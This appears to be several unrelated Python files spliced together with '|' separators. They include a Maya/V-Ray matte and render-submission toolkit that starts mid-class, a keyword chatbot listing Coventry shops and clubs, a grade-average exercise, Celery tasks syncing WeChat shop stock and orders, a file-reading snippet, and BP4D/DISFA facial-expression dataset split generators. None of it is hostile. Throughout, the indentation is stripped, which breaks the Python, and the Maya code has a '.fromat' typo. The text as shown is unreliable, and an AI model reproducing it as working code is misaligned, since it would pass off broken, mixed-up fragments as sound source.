if cmds.window("matte_layer_name", query=True, exists=True):
cmds.deleteUI("matte_layer_name")
cmds.window("matte_layer_name", title="Create Matte Layer",
sizeable=False, mnb=False, mxb=False)
cmds.columnLayout(adjustableColumn=True)
cmds.text(label='Select All Objects You Want Included in Layer', h=30)
cmds.textFieldButtonGrp('layer_name', label='Layer Name:', h=30, cw=[1, 60],
text='Layer Name', buttonLabel='Execute',
bc=lambda *x: self.create_matte_layer())
cmds.window("matte_layer_name", edit=True, width=100, height=80)
cmds.showWindow()
pm.scrollField(self.ui.printedInfo, text="Success - Matte Layer", e=True)
def create_matte_layer(self, *args):
selectedObjects = cmds.ls(selection=True)
layer_name = cmds.textFieldButtonGrp('layer_name', query=True, text=True)
auto_layer_core_m.Matte().scene_matte_create('{}'.format(layer_name))
cLayer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
for i in selectedObjects:
cmds.editRenderLayerMembers(cLayer, i, nr=True)
if cmds.window("matte_layer_name", query=True, exists=True):
cmds.deleteUI("matte_layer_name")
def red_matte(self, *args):
selection = cmds.ls(sl=True)
c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
auto_layer_core_m.Matte().create_RGB_shader('Red')
auto_layer_core_m.Matte().assign_shaders(redList=selection, greenList=None, blueList=None, holdOutList=None, renderLayer=c_render_layer)
pm.scrollField(self.ui.printedInfo, text="Success - Red Matte", e=True)
def green_matte(self, *args):
selection = cmds.ls(sl=True)
c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
auto_layer_core_m.Matte().create_RGB_shader('Green')
auto_layer_core_m.Matte().assign_shaders(redList=None, greenList=selection, blueList=None, holdOutList=None, renderLayer=c_render_layer)
pm.scrollField(self.ui.printedInfo, text="Success - Green Matte", e=True)
def blue_matte(self, *args):
selection = cmds.ls(sl=True)
c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
auto_layer_core_m.Matte().create_RGB_shader('Blue')
auto_layer_core_m.Matte().assign_shaders(redList=None, greenList=None, blueList=selection, holdOutList=None, renderLayer=c_render_layer)
pm.scrollField(self.ui.printedInfo, text="Success - Blue Matte", e=True)
def hold_out_matte(self, *args):
selection = cmds.ls(sl=True)
auto_layer_core_m.Matte().create_holdout_shader()
color = 'Holdout'
cmds.select(selection)
geoList = cmds.ls(dag=1, o=1, s=1, sl=1)
for geo in geoList:
try:
geoSG = cmds.listConnections(geo, type='shadingEngine')
for each in geoSG:
shaders = cmds.ls(cmds.listConnections(each), materials=1)
cmds.editRenderLayerAdjustment("{}.surfaceShader".format(each))
cmds.disconnectAttr("{}.outColor".format(shaders[0]),
"{}.surfaceShader".format(each))
cmds.connectAttr("{}_Matte_Shader.outColor".format(color),
"{}.surfaceShader".fromat(each))
cmds.select(each, noExpand=True, replace=True)
matteName = cmds.ls(selection=True)[0]
pm.mel.eval('vray addAttributesFromGroup ' + matteName + ' vray_material_id 1;')
cmds.editRenderLayerAdjustment("{}.vrayColorId".format(each))
except:
pass
pm.scrollField(self.ui.printedInfo, text="Success - Hold Out", e=True)
def shader_material_id(self, color):
print(color)
list_of_shaders = list()
for each_node in pm.ls(selection=True):
try:
child_nodes = each_node.listRelatives(ni=True)
except Exception:
continue
for each_child_node in child_nodes:
shading_engine = each_child_node.shadingGroups()
for each_shading_engine in shading_engine:
connections = pm.listConnections(each_shading_engine + '.surfaceShader')
list_of_shaders.extend(connections)
# print list_of_shaders
mat_name = "Material_ID"
for Shader in list_of_shaders:
if cmds.objExists(mat_name):
pass
if cmds.getAttr(mat_name + '.enabled') is False:
cmds.editRenderLayerAdjustment(mat_name + '.enabled')
cmds.setAttr(mat_name + '.enabled', True)
else:
Matid = mel.eval('vrayAddRenderElement materialIDChannel;')
# rename Material ID
NewID = cmds.rename(Matid, mat_name)
# cmds.setAttr(NewID+".vray_filename_mtlid", type="string")
cmds.setAttr(NewID + '.vray_filename_mtlid', mat_name, type='string')
mel.eval('vray addAttributesFromGroup ' + Shader + ' vray_material_id 1;')
if 'Red' in color:
cmds.setAttr(Shader + ".vrayColorId", 1, 0, 0,
type="double3")
if 'Green' in color:
cmds.setAttr(Shader + ".vrayColorId", 0, 1, 0,
type="double3")
if 'Blue' in color:
cmds.setAttr(Shader + ".vrayColorId", 0, 0, 1,
type="double3")
if 'Hold' in color:
cmds.setAttr(Shader + ".vrayColorId", 0, 0, 0,
type="double3")
pm.scrollField(self.ui.printedInfo, text="Success - Mat ID", e=True)
# Shot General -GENERAL TOOLS-
def gi_bake_tool(self, *args):
gi_bake.GIBakeTool().renderLayerOutPutQuery()
pm.scrollField(self.ui.printedInfo, text="Success - GI Bake", e=True)
def propagate_lighting_tool(self, *args):
shot_prop.PropagatorTool().shotProp_UI()
pm.scrollField(self.ui.printedInfo, text="Success - Propagator", e=True)
def shader_adjustment_tool(self, *args):
shader_m.ShaderSubdiv().UI()
pm.scrollField(self.ui.printedInfo, text="Success - Shader Adjustments", e=True)
def dock_control_tool(self, *args):
dock_m.DockControl().UI()
pm.scrollField(self.ui.printedInfo, text="Success - Dock Control", e=True)
# Shot Completion -POST PROCES ACTIONS
def fix_tx(self, *args):
tx_fix.ForcePath().texture_path_swap('.tx')
def episode_constant_tools(self):
# import wds_tools.lrc.episodic_tools.Episode_Constant_Tools as ep_cons
# ep_cons.constant_tool_execute()
path_to_code = 'B:\\artists\\current\\src\\wds_tools\\lrc\\episodic_tools\\Episode_Constant_Tools.py'
print(path_to_code)
n = imp.load_source('tempName', path_to_code)
info = n.constant_tool_execute()
return info
def run_episode_tool(self, *args):
curr = cmds.file(q=True, sn=True)
if len(curr.split('/')) > 7:
ep = curr.split('/')[7]
path_to_code = self._EP_TOOLS + ep + '_Tools.py'
try:
if path_to_code:
print(path_to_code)
n = imp.load_source('tempName', path_to_code)
info = n.combo_execute()
return info
else:
print "path not found"
except:
print "no tools for this episode"
else:
cmds.warning('Not a DW Lighting Shot')
def filename_underscore_fix(self, *args):
prefix_name = cmds.getAttr('vraySettings.fileNamePrefix')
if prefix_name.endswith('_') is False:
cmds.setAttr('vraySettings.fileNamePrefix', prefix_name + '_', type='string')
def disable_elements_layer(self, *arg):
cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
all_render_elements = cmds.ls(type="VRayRenderElement")
all_render_elements_set = cmds.ls(type="VRayRenderElementSet")
# print all_render_elements
cmds.editRenderLayerGlobals(crl="defaultRenderLayer")
for each in all_render_elements + all_render_elements_set:
# print 'Dont use the masterLayer!'
cmds.setAttr(each + ".enabled", 0)
def remove_plugin(self, *args):
plugin_list = cmds.unknownPlugin(q=True, l=True)
if plugin_list:
for each in plugin_list:
try:
cmds.unknownPlugin(each, remove=True)
except RuntimeError:
print("Error Cant Remove!\n Plugin: {}".format(each))
def light_tweaker(self, *args):
spec.run()
# tweak_m.run_light_tweaker(offsetkey=False, placefill=False, setrims=False, eyespecs=True)
def world_pref_element(self, *args):
world_pref.CreateWorldPref().assign_texture_ref_object()
# SUBMIT SHOT TO DEALINE
def submit(self, *args):
mayaPath = cmds.file(q=True, sceneName=True)
sceneInfo = SceneInfo(mayaPath)
fileName = sceneInfo.get_file_name()
if 'Lgt_v001' not in str(fileName):
cmds.modelEditor('modelPanel4', e=True,
displayAppearance='boundingBox')
cmds.modelEditor('modelPanel4', e=True, allObjects=0)
cmds.modelEditor('modelPanel4', e=True, polymeshes=True)
cmds.modelEditor('modelPanel4', e=True, lights=True)
app = farm.bd_deadline_submitter.DeadlineSubmitter()
app.run()
pm.scrollField(self.ui.printedInfo, text="Success - Submit Deadline", e=True)
else:
prompt = cmds.confirmDialog(title='Version Control',
message='Your working on Version 001! Press OK to Increment Before Submitting',
button=['OK'], defaultButton='Yes',
cancelButton='No',
dismissString='No')
if str(prompt) == 'OK':
self.increment_save()
|
userinput = raw_input("welcome to the chatbot... ") #this input will be changed once integrated with other code
shopsDict = ['Wilkinsons', 'SPAR', 'Boots', 'Marks & Spencers' ]
clothingDict = ['Topshop', 'Topman', 'H&M', 'Riverisland', 'Debenhams', 'JD', 'Sportsdirect', 'Footlocker', 'Primark', 'Newlook' ]
upcomingGamesDict = ['Call of Duty WWII', 'Star Wars Battlefront II', 'Far Cry 5', 'Dragon Ball FighterZ' ]
eventsDict = ['Christmas lights_switch_on', 'Farmers market', 'CAIF peace concert', 'Christmas fair' ]
cinemaDict = ['Paddington 2', 'Thor Ragnarok', 'Jigsaw', 'Murder on the orient express', 'A bad moms christmas', 'Dispicable me 3']
clubbingDict = ['Kabash', 'Scholars', 'Rainbows', 'Catchtwentytwo', 'ClubM', 'DaddyCools', 'JJ', 'Rileys sports bar' ]
#Lists which allow for all the data to be stored allowing us to see what is avaliable in coventry
#if statments are used to be able to compare user information
if any(drink in userinput for drink in ("drinking", "club", "bar")):
print "The following are clubs in the Coventry area... "+ ', '.join(clubbingDict)
elif any(shop in userinput for shop in ("shop", "shopping","shops", "store", "stores")):
print "The following are shops in the Coventry area... "+ ', '.join(shopsDict)
elif any(clothe in userinput for clothe in ("clothing", "clothe", "shoe")):
print "The following are clothing stores in the Coventry area... "+ ', '.join(clothingDict)
elif any(games in userinput for games in ("games", "game", "gaming", "video games")):
print "The following are upcoming games... "+ ', '.join(upcomingGamesDict)
elif any(event in userinput for event in ("event", "events", "upcoming")):
print "The following are events in the Coventry area... "+ ', '.join(eventsDict)
elif any(movie in userinput for movie in ("film", "films", "cinema", "movie")):
print "The following are films showing in the Coventry area... "+ ', '.join(cinemaDict)
#These if statments will give the user an output of a list of all of the information as an output
else:
print "I'm sorry I don't know what you said"
#this shows the alternative output making it clear to the user that it does not understand the input
|
# Mostra a média de duas notas (com 1 casa decimal)
n1 = int(input('Digite a nota 1: '))
n2 = int(input('Digite a nota 2: '))
print('A média das notas {} e {} é {:.1f}'.format(n1, n2, (n1+n2)/2))
|
#-*- coding:utf8 -*-
import time
import datetime
import json
from celery.task import task
from celery.task.sets import subtask
from django.conf import settings
from common.utils import update_model_fields, replace_utf8mb4
from .models import WeiXinUser,WXOrder,WXProduct,WXProductSku,WXLogistic,WeixinUnionID
from .service import WxShopService
from .weixin_apis import WeiXinAPI,WeiXinRequestException
from shopback.items.models import Product,ItemNumTaskLog
import logging
logger = logging.getLogger('celery.handler')
def update_weixin_productstock():
products = Product.objects.filter(shelf_status=1,sale_time=datetime.date.today()-datetime.timedelta(days=1))
wx_api = WeiXinAPI()
cnt = 0
for product in products[18:]:
cnt += 1
wx_skus = WXProductSku.objects.filter(outer_id=product.outer_id).order_by('-modified')
if wx_skus.count() > 0:
try:
wx_pid = wx_skus[0].product_id
WXProduct.objects.getOrCreate(wx_pid,force_update=True)
except Exception,exc:
logger.error(exc.message,exc_info=True)
continue
for sku in product.pskus:
outer_id = product.outer_id
outer_sku_id = sku.outer_id
sync_num = sku.remain_num - sku.wait_post_num
if sync_num < 0 :
sync_num = 0
try:
wx_skus = WXProductSku.objects.filter(outer_id=outer_id,
outer_sku_id=outer_sku_id)
for wx_sku in wx_skus:
vector_num = sync_num - wx_sku.sku_num
if vector_num == 0:continue
if vector_num > 0:
wx_api.addMerchantStock(wx_sku.product_id,
vector_num,
sku_info=wx_sku.sku_id)
else:
wx_api.reduceMerchantStock(wx_sku.product_id,
abs(vector_num),
sku_info=wx_sku.sku_id)
ItemNumTaskLog.objects.get_or_create(user_id=7,
outer_id=outer_id,
sku_outer_id='wx%s'%outer_sku_id,
num=sync_num,
end_at=datetime.datetime.now())
except Exception,exc:
logger.error(exc.message,exc_info=True)
@task(max_retry=3,default_retry_delay=60)
def task_Update_Weixin_Userinfo(openId,unionId=None):
try:
_wx_api = WeiXinAPI()
userinfo = _wx_api.getUserInfo(openId)
wx_user,state = WeiXinUser.objects.get_or_create(openid=openId)
pre_subscribe_time = wx_user.subscribe_time
pre_nickname = wx_user.nickname
for k, v in userinfo.iteritems():
if hasattr(wx_user, k) :
setattr(wx_user, k, v or getattr(wx_user, k))
wx_user.nickname = pre_nickname or replace_utf8mb4(wx_user.nickname.decode('utf8'))
wx_user.unionid = wx_user.unionid or unionId or ''
subscribe_time = userinfo.get('subscribe_time', None)
if subscribe_time:
wx_user.subscribe_time = pre_subscribe_time or datetime.datetime\
.fromtimestamp(int(subscribe_time))
key_list = ['openid','sex','language','headimgurl','country','province','nickname','unionid','subscribe_time','sceneid']
update_model_fields(wx_user,update_fields=key_list)
if not wx_user.unionid:
return
app_key = _wx_api._wx_account.app_id
WeixinUnionID.objects.get_or_create(openid=openId,app_key=app_key,unionid=wx_user.unionid)
except Exception, exc:
raise task_Update_Weixin_Userinfo.retry(exc=exc)
@task(max_retry=3,default_retry_delay=60)
def task_Mod_Merchant_Product_Status(outer_ids,status):
from shopback.items.models import Product
from shopback import signals
update_wxpids = set([])
_wx_api = WeiXinAPI()
try:
for outer_id in outer_ids:
wx_skus = WXProductSku.objects.filter(outer_id=outer_id).values('product').distinct()
wx_prodids = [p['product'] for p in wx_skus]
wx_prods = WXProduct.objects.filter(product_id__in=wx_prodids).order_by('-modified')
if wx_prods.count() == 0 :
continue
wx_product = wx_prods[0]
wxproduct_id = wx_product.product_id
if wxproduct_id not in update_wxpids:
update_wxpids.add(wxproduct_id)
_wx_api.modMerchantProductStatus(wxproduct_id, status)
product = Product.objects.get(outer_id=outer_id)
if status == WXProduct.UP_ACTION:
product.shelf_status = Product.UP_SHELF
#发送商品上架消息
signals.signal_product_upshelf.send(sender=Product,product_list=[product])
else:
product.shelf_status = Product.DOWN_SHELF
product.save()
except WeiXinRequestException, exc:
raise task_Mod_Merchant_Product_Status.retry(exc=exc)
@task
def pullWXProductTask():
_wx_api = WeiXinAPI()
products = _wx_api.getMerchantByStatus(0)
up_shelf_ids = []
for product in products:
WXProduct.objects.createByDict(product)
up_shelf_ids.append(product['product_id'])
WXProduct.objects.exclude(product_id__in=up_shelf_ids)\
.update(status=WXProduct.DOWN_SHELF)
@task
def pullWaitPostWXOrderTask(begintime,endtime,full_update=False):
update_status=[#WXOrder.WX_WAIT_PAY,
WXOrder.WX_WAIT_SEND,
WXOrder.WX_WAIT_CONFIRM,
WXOrder.WX_FINISHED]
_wx_api = WeiXinAPI()
if not begintime and _wx_api._wx_account.order_updated:
begintime = int(time.mktime((_wx_api._wx_account.order_updated - datetime.timedelta(seconds=6*60*60)).timetuple()))
dt = datetime.datetime.now()
endtime = endtime and endtime or int(time.mktime(dt.timetuple()))
if full_update:
begintime = None
endtime = None
for status in update_status:
orders = _wx_api.getOrderByFilter(status=status,begintime=begintime,endtime=endtime)
for order_dict in orders:
order = WxShopService.createTradeByDict(_wx_api._wx_account.account_id, order_dict)
WxShopService.createMergeTrade(order)
_wx_api._wx_account.changeOrderUpdated(dt)
@task
def pullFeedBackWXOrderTask(begintime,endtime):
_wx_api = WeiXinAPI()
if not begintime and _wx_api._wx_account.refund_updated:
begintime = int(time.mktime(_wx_api._wx_account.refund_updated.timetuple()))
dt = datetime.datetime.now()
endtime = endtime and endtime or int(time.mktime(dt.timetuple()))
orders = _wx_api.getOrderByFilter(WXOrder.WX_FEEDBACK,begintime,endtime)
for order_dict in orders:
order = WxShopService.createTradeByDict(_wx_api._wx_account.account_id,
order_dict)
WxShopService.createMergeTrade(order)
_wx_api._wx_account.changeRefundUpdated(dt)
@task
def syncStockByWxShopTask(wx_product):
from shopback.items.models import Product,ProductSku,ItemNumTaskLog
from shopback.trades.models import MergeOrder
from shopback.users.models import User
if not isinstance(wx_product,WXProduct):
wx_product = WXProduct.objects.get(product_id=wx_product)
if not wx_product.sync_stock:
return
wx_api = WeiXinAPI()
wx_openid = wx_api.getAccountId()
wx_user = User.objects.get(visitor_id=wx_openid)
user_percent = wx_user.stock_percent
skus = wx_product.sku_list or []
for sku in skus:
if not sku.get('product_code',None):
continue
try:
outer_id,outer_sku_id = Product.objects.trancecode('',
sku['product_code'],
sku_code_prior=True)
#特卖商品暂不同步库存
if outer_id.startswith(('1','8','9')) and len(outer_id) >= 9:
continue
product = Product.objects.get(outer_id=outer_id)
product_sku = ProductSku.objects.get(outer_id=outer_sku_id,
product__outer_id=outer_id)
except:
continue
if not (wx_user.sync_stock and product.sync_stock and product_sku.sync_stock):
continue
wait_nums = (product_sku.wait_post_num>0 and
product_sku.wait_post_num or 0)
remain_nums = product_sku.remain_num or 0
real_num = product_sku.quantity
sync_num = real_num - wait_nums - remain_nums
#如果自动更新库存状态开启,并且计算后库存不等于在线库存,则更新
if sync_num>0 and user_percent>0:
sync_num = int(user_percent*sync_num)
elif sync_num >0 and sync_num <= product_sku.warn_num:
total_num,user_order_num = MergeOrder.get_yesterday_orders_totalnum(wx_user.id,
outer_id,
outer_sku_id)
if total_num>0 and user_order_num>0:
sync_num = int(float(user_order_num)/float(total_num)*sync_num)
else:
sync_num = (real_num - wait_nums)>10 and 2 or 0
elif sync_num > 0:
product_sku.is_assign = False
update_model_fields(product_sku,update_fields=['is_assign'])
else:
sync_num = 0
# #针对小小派,测试线上库存低量促销效果
# if product.outer_id == '3116BG7':
# sync_num = product_sku.warn_num > 0 and min(sync_num,product_sku.warn_num+10) or min(sync_num,15)
#
if product_sku.is_assign:
sync_num = 0
#同步库存数不为0,或者没有库存警告,同步数量不等于线上库存,并且店铺,商品,规格同步状态正确
if (sync_num != sku['quantity']):
vector_num = sync_num - sku['quantity']
if vector_num > 0:
wx_api.addMerchantStock(wx_product.product_id,
vector_num,
sku_info=sku['sku_id'])
else:
wx_api.reduceMerchantStock(wx_product.product_id,
abs(vector_num),
sku_info=sku['sku_id'])
ItemNumTaskLog.objects.get_or_create(user_id=wx_user.user.id,
outer_id=outer_id,
sku_outer_id='wx%s'%outer_sku_id,
num=sync_num,
end_at=datetime.datetime.now())
@task
def syncWXProductNumTask():
pullWXProductTask()
wx_products = WXProduct.objects.filter(status=WXProduct.UP_SHELF)
for wx_product in wx_products:
syncStockByWxShopTask(wx_product)
|
f = open("one.txt", "r")
print(f.read())
print()
f = open("one.txt", "r")
print(f.readline())
print(f.readline())
f = open("one.txt", "r")
print(f.read(10))
|
import os
import config
from sklearn.model_selection import KFold
import numpy as np
from collections import defaultdict
import math
# Leave one subject out
# data_format:
# image_path label1,label2,?label_ignore1,?label_ignore2 #/orig_img_path BP4D/DISFA
# tab split, #/orig_img_path means '#': orignal img_path not transform, orig_img_path is from transform,so first image_path is transformed image
# 这个函数暂时没用到
def get_BP4D_AU_intensity():
video_frame_AU = defaultdict(dict)
root_dir = config.DATA_PATH["BP4D"] + "AU-Intensity-Codes3.0"
for AU in os.listdir(root_dir):
for csv_file_name in os.listdir(root_dir + os.sep + AU):
AU = AU[2:]
video_name = csv_file_name[:csv_file_name.rindex("_")]
with open(root_dir + os.sep + AU + os.sep + csv_file_name, "r") as file_obj:
for line in file_obj:
frame, AU_intensity = line.strip().split(",")
frame = int(frame)
AU_intensity = int(AU_intensity)
if frame not in video_frame_AU[video_name]:
video_frame_AU[video_name][frame] = dict()
video_frame_AU[video_name][frame][AU] = AU_intensity
return video_frame_AU
def single_AU_RCNN_BP4D_subject_id_file(idx_folder_path, kfold=None, validation_size=3000): # partition_path is dict{"trn":..., "valid":xxx}
for BP4D_AU in config.paper_use_BP4D:
full_pretrain = set()
subject_video = defaultdict(dict) # key is subject id
for file_name in os.listdir(config.DATA_PATH["BP4D"] + "/AUCoding"):
if not file_name.endswith(".csv"): continue
subject_name = file_name.split("_")[0]
sequence_name = file_name[file_name.rindex("_") + 1:file_name.rindex(".")]
video_dir = config.RGB_PATH["BP4D"] + os.sep + subject_name + os.sep + sequence_name
first_frame_file_name = os.listdir(video_dir)[0]
first_frame_file_name = first_frame_file_name[:first_frame_file_name.rindex(".")]
frame_len = len(first_frame_file_name)
AU_column_idx = dict()
print("reading:{}".format("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name)))
with open("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name), "r") as au_file_obj:
for idx, line in enumerate(au_file_obj):
if idx == 0: # header specify Action Unit
for col_idx, _AU in enumerate(line.split(",")[1:]):
AU_column_idx[_AU] = col_idx + 1 # read header
continue # read head over , continue
lines = line.split(",")
frame = lines[0].zfill(frame_len)
img_file_path = video_dir + os.sep + frame+".jpg"
if os.path.exists(img_file_path):
AU_set = set()
if int(lines[AU_column_idx[BP4D_AU]]) == 1:
AU_set.add(BP4D_AU)
if len(AU_set) == 0:
AU_set.add("0") # 该frame没有AU
if sequence_name not in subject_video[subject_name]:
subject_video[subject_name][sequence_name] = list()
subject_video[subject_name][sequence_name].append({"img_path":img_file_path, "AU_label":AU_set,
"database":"BP4D",
"frame":frame, "video_name": "{0}_{1}".format(subject_name, sequence_name)})
print("reading AU-coding file done")
subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
if kfold is not None:
kf = KFold(n_splits=kfold, shuffle=True)
i = 0
folder_path = "{0}/AU_{1}/{2}_fold".format(idx_folder_path, BP4D_AU, kfold)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for train_index, test_index in kf.split(subject_name_ls):
i += 1
train_name_array = subject_name_ls[train_index]
test_name_array = subject_name_ls[test_index]
balance_line = defaultdict(list) # AU : write_lines
for subject_name in train_name_array:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
full_pretrain.add(line)
balance_line[AU_set_str].append(line)
ratio = max(len(lines) for lines in balance_line.values()) // min(
len(lines) for lines in balance_line.values())
new_lines = []
for AU_set_str, lines in balance_line.items():
if AU_set_str != "0":
for _ in range(ratio):
for line in lines:
new_lines.append(line)
balance_line[BP4D_AU].extend(new_lines)
with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
for AU_set_str, lines in balance_line.items():
for line in lines:
file_obj.write(line)
file_obj.flush()
validate_lines = []
with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
for subject_name in test_name_array:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
validate_lines.append(line)
full_pretrain.add(line)
file_obj.write("{}".format(line))
file_obj.flush()
validate_lines = np.random.choice(validate_lines, validation_size, replace=False)
with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
for line in validate_lines:
file_obj.write("{}".format(line))
file_obj.flush()
with open("{0}/full_pretrain.txt".format(folder_path), "w") as file_obj:
for line in full_pretrain:
file_obj.write(line)
file_obj.flush()
def single_AU_DISFA_subject_id_file(idx_folder_path, kfold=None, partition_file_path=None):
for DISFA_AU in config.paper_use_DISFA:
DISFA_base_dir = config.DATA_PATH["DISFA"]
label_file_dir = DISFA_base_dir + "/ActionUnit_Labels/"
subject_video = defaultdict(dict) # key is subject id
orientations = ["Left", "Right"]
for video_name in os.listdir(label_file_dir):
frame_label = {}
for label_file_name in os.listdir(label_file_dir+os.sep+video_name):
AU = label_file_name[label_file_name.index("au") + 2: label_file_name.rindex(".")]
if AU != DISFA_AU:
continue
with open(label_file_dir+os.sep+video_name+os.sep+label_file_name, "r") as file_obj:
for line in file_obj:
line = line.strip()
if line:
frame, AU_intensity = line.split(",")
AU_intensity = int(AU_intensity)
if frame not in frame_label:
frame_label[frame] = set()
if AU_intensity >= 1: # FIXME 是否需要改为>= 1?
frame_label[frame].add(AU)
for orientation in orientations:
img_folder = DISFA_base_dir + "/Img_{}Camera".format(orientation)
for frame, AU_set in sorted(frame_label.items(), key=lambda e:int(e[0])):
if orientation not in subject_video[video_name]:
subject_video[video_name][orientation] = []
img_file_path = img_folder + "/" + video_name + "/" + frame + ".jpg"
if os.path.exists(img_file_path):
subject_video[video_name][orientation].append({"img_path":img_file_path, "AU_label":AU_set,
"database":"DISFA"})
subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
if kfold is not None:
kf = KFold(n_splits=kfold, shuffle=True)
i = 0
for train_index, test_index in kf.split(subject_name_ls):
i += 1
train_name_array = subject_name_ls[train_index]
test_name_array = subject_name_ls[test_index]
folder_path = "{0}/AU_{1}/{2}_fold".format(idx_folder_path, DISFA_AU, kfold)
print(folder_path)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
balance_line = defaultdict(list) # DISFA_AU : write_lines
for video_name in train_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
line = "{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"])
balance_line[AU_set_str].append(line)
ratio = max(len(lines) for lines in balance_line.values()) // min(len(lines) for lines in balance_line.values())
new_lines = []
for AU_set_str, lines in balance_line.items():
if AU_set_str != "0":
for _ in range(ratio):
for line in lines:
new_lines.append(line)
balance_line[DISFA_AU].extend(new_lines)
with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
for AU_set_str, lines in balance_line.items():
for line in lines:
file_obj.write(line)
file_obj.flush()
with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
for video_name in test_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
file_obj.flush()
with open("{0}/id_valid_{1}.txt".format(folder_path, i), "w") as file_obj:
for video_name in test_name_array:
for orientation, video_info_lst in subject_video[video_name].items():
for video_info in video_info_lst:
img_file_path = video_info["img_path"]
img_file_path = os.sep.join(img_file_path.split("/")[-3:])
AU_set_str = ",".join(video_info["AU_label"])
if len(video_info["AU_label"]) == 0:
AU_set_str = "0"
orig_from_path = "#"
file_obj.write("{0}\t{1}\t{2}\t{3}\n".format(img_file_path, AU_set_str,orig_from_path,video_info["database"]))
file_obj.flush()
def gen_BP4D_subject_id_file(idx_folder_path, kfold=None, partition_path=None, validation_size=3000): # partition_path is dict{"trn":..., "valid":xxx}
subject_video = defaultdict(dict) # key is subject id
BP4D_lines = set()
pretrained_full = set()
for file_name in os.listdir(config.DATA_PATH["BP4D"] + "/AUCoding"):
if not file_name.endswith(".csv"): continue
subject_name = file_name.split("_")[0]
sequence_name = file_name[file_name.rindex("_") + 1:file_name.rindex(".")]
video_dir = config.RGB_PATH["BP4D"] + os.sep + subject_name + os.sep + sequence_name
first_frame_file_name = os.listdir(video_dir)[0]
first_frame_file_name = first_frame_file_name[:first_frame_file_name.rindex(".")]
frame_len = len(first_frame_file_name)
AU_column_idx = dict()
print("reading:{}".format("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name)))
with open("{0}/{1}".format(config.DATA_PATH["BP4D"] + "/AUCoding", file_name), "r") as au_file_obj:
for idx, line in enumerate(au_file_obj):
if idx == 0: # header specify Action Unit
for col_idx, AU in enumerate(line.split(",")[1:]):
AU_column_idx[AU] = col_idx + 1 # read header
continue # read head over , continue
lines = line.split(",")
frame = lines[0].zfill(frame_len)
img_file_path = video_dir + os.sep + frame+".jpg"
if os.path.exists(img_file_path):
AU_set = set()
for AU in config.AU_ROI.keys():
if int(lines[AU_column_idx[AU]]) == 1:
AU_set.add(AU)
elif int(lines[AU_column_idx[AU]]) == 9:
AU_set.add("?{}".format(AU))
if len(AU_set) == 0 or not list(filter(lambda e: not e.startswith("?"), AU_set)):
AU_set.add("0") # 该frame没有AU
if sequence_name not in subject_video[subject_name]:
subject_video[subject_name][sequence_name] = list()
subject_video[subject_name][sequence_name].append({"img_path":img_file_path, "AU_label":AU_set, "database":"BP4D"})
print("reading AU-coding file done")
subject_name_ls = np.array(list(subject_video.keys()), dtype=str)
if kfold is not None:
kf = KFold(n_splits=kfold, shuffle=True)
i = 0
folder_path = "{0}/{1}_fold".format(idx_folder_path, kfold)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
for train_index, test_index in kf.split(subject_name_ls):
i += 1
train_name_array = subject_name_ls[train_index]
test_name_array = subject_name_ls[test_index]
with open("{0}/id_trainval_{1}.txt".format(folder_path, i), "w") as file_obj:
for subject_name in train_name_array:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
pretrained_full.add(line)
file_obj.write("{}\n".format(line))
file_obj.flush()
validate_lines = []
with open("{0}/id_test_{1}.txt".format(folder_path, i), "w") as file_obj:
for subject_name in test_name_array:
for info_dict in subject_video[subject_name].values():
for video_info in info_dict:
orig_from_path = "#"
AU_set = video_info["AU_label"]
img_file_path = os.sep.join(video_info["img_path"].split(os.sep)[-3:])
AU_set_str = ",".join(AU_set)
line = "{0}\t{1}\t{2}\t{3}".format(img_file_path, AU_set_str, orig_from_path, "BP4D")
validate_lines.append(line)
pretrained_full.add(line)
file_obj.write("{}\n".format(line))
file_obj.flush()
validate_lines = np.random.choice(validate_lines, validation_size, replace=False)
